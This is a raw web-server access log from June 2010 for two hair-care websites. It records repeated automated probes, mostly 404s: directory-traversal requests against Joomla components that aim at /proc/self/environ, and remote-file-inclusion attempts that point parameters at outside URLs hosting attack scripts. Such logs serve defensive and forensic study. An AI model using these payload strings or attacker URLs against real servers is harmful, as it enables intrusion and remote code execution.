216.131.96.193 - - [28/Jun/2010:07:33:37 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:07:34:16 -0700] "GET /logs/access_100607.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:34:16 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:34:16 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:34:21 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:34:24 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:34:27 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:34:32 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
121.254.172.27 - - [28/Jun/2010:07:35:09 -0700] "GET /logs//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:35:09 -0700] "GET /index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:35:09 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:35:42 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:35:42 -0700] "GET /index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:35:43 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
121.254.172.27 - - [28/Jun/2010:07:35:43 -0700] "GET /logs//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:35:45 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
121.254.172.27 - - [28/Jun/2010:07:35:59 -0700] "GET /index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:35:59 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:36:00 -0700] "GET /logs//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:36:12 -0700] "GET /logs/access_100208.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:36:46 -0700] "GET /logs/access_100208.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.94.177.94 - - [28/Jun/2010:07:36:48 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.172.27 - - [28/Jun/2010:07:36:59 -0700] "GET /logs/access_100208.log%20%20//index.php?option=com_search&sstring=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:37:07 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:37:16 -0700] "GET /logs/access_100503.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:37:16 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:37:16 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:37:36 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:37:53 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:38:12 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:07:38:32 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:07:38:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:07:38:33 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:38:57 -0700] "GET /logs/access_100614.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:39:02 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:39:03 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:39:03 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.143 - - [28/Jun/2010:07:39:11 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.143 - - [28/Jun/2010:07:39:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.143 - - [28/Jun/2010:07:39:12 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:39:14 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:39:39 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:07:39:46 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.150.189.35 - - [28/Jun/2010:07:39:48 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.150.189.35 - - [28/Jun/2010:07:39:48 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.150.189.35 - - [28/Jun/2010:07:39:48 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:39:57 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:39:59 -0700] "GET /logs/access_100510.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.212.226.210 - - [28/Jun/2010:07:40:07 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "growlonghairfast.com"
91.212.226.210 - - [28/Jun/2010:07:40:07 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:07:40:11 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:07:40:11 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.240.26.129 - - [28/Jun/2010:07:40:11 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.120.237.104 - - [28/Jun/2010:07:40:29 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.53.88.242 - - [28/Jun/2010:07:40:37 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shst-support.ru/diabolic/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.53.88.242 - - [28/Jun/2010:07:40:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shst-support.ru/diabolic/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.53.88.242 - - [28/Jun/2010:07:40:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shst-support.ru/diabolic/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.115.111.248 - - [28/Jun/2010:07:40:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
119.235.18.3 - - [28/Jun/2010:07:41:33 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.18.3 - - [28/Jun/2010:07:41:33 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.18.3 - - [28/Jun/2010:07:41:33 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:41:38 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:07:41:48 -0700] "GET /logs/access_100412.log//modules/errors.php?error=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:07:41:48 -0700] "GET /modules/errors.php?error=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.176.232 - - [28/Jun/2010:07:41:48 -0700] "GET /logs//modules/errors.php?error=http://phimhanquoc.info/to-be-del/images/fbfiles/ava?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:41:52 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:41:55 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:41:57 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:42:10 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
210.240.26.129 - - [28/Jun/2010:07:42:13 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.240.26.129 - - [28/Jun/2010:07:42:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.240.26.129 - - [28/Jun/2010:07:42:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:43:00 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:43:14 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
119.235.18.3 - - [28/Jun/2010:07:43:23 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.18.3 - - [28/Jun/2010:07:43:23 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.18.3 - - [28/Jun/2010:07:43:23 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.162.118.240 - - [28/Jun/2010:07:43:38 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
187.45.193.143 - - [28/Jun/2010:07:45:23 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
187.45.193.159 - - [28/Jun/2010:07:45:38 -0700] "GET /logs/access_100621.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.34.165.224 - - [28/Jun/2010:07:45:57 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:45:59 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
74.53.88.242 - - [28/Jun/2010:07:46:04 -0700] "GET /logs/access_100503.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shst-support.ru/diabolic/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:46:26 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:46:26 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:46:26 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:46:50 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:46:50 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:46:50 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:47:19 -0700] "GET /logs/access_100531.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:47:20 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:47:20 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:48:01 -0700] "GET /logs/access_100614.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:48:01 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.162.118.240 - - [28/Jun/2010:07:48:01 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
64.150.189.35 - - [28/Jun/2010:07:48:22 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kdsa.or.kr/board/Thumbs/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.120.237.104 - - [28/Jun/2010:07:50:26 -0700] "GET /logs/access.log//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:50:26 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:50:26 -0700] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
91.212.226.210 - - [28/Jun/2010:07:50:36 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "freehairsecrets.com"
91.212.226.210 - - [28/Jun/2010:07:50:36 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:51:46 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.34.165.224 - - [28/Jun/2010:07:51:46 -0700] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:17 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:17 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:18 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:52:34 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:52:34 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.120.237.104 - - [28/Jun/2010:07:52:34 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:50 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:50 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:52:51 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:28 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:28 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:28 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:52 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:52 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:53:52 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.131.96.193 - - [28/Jun/2010:07:54:47 -0700] "GET /logs/access_100503.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:54:47 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
216.131.96.193 - - [28/Jun/2010:07:54:48 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
